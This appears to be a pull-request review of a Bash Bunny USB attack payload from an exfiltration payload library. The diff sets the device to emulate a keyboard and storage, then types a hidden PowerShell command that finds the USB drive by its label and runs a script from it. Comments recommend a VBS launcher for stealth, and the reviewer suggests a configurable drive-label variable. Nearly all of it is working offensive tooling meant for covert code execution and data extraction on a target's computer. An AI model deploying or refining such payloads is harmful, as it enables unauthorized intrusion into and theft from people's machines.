payloads/library/exfiltration/improved-usb-extractor/payload.txt

```diff
@@ -0,0 +1,11 @@
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+GET SWITCH_POSITION
+LED ATTACK
+ATTACKMODE HID STORAGE
+
+# For improved stealth, if target supports Visual Basic Script, change the
+# launch line below to launch z.cmd instead of x.cmd.
+# Documentation line from original project:
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\x.cmd')"
```

Comment:
I would recommend using a variable assignment for the drive label as not everyone's configuration will have the default `BashBunny`  drive label. This makes user configuration much easier. 

You can do this by adding it to the top of your payload. For example with line: 
```
DRIVE_LABEL="BashBunny"
RUN WIN powershell ".((gwmi win32_volume -f 'label=''$DRIVE_LABEL''').Name+'payloads\\$SWITCH_POSITION\x.cmd')"
```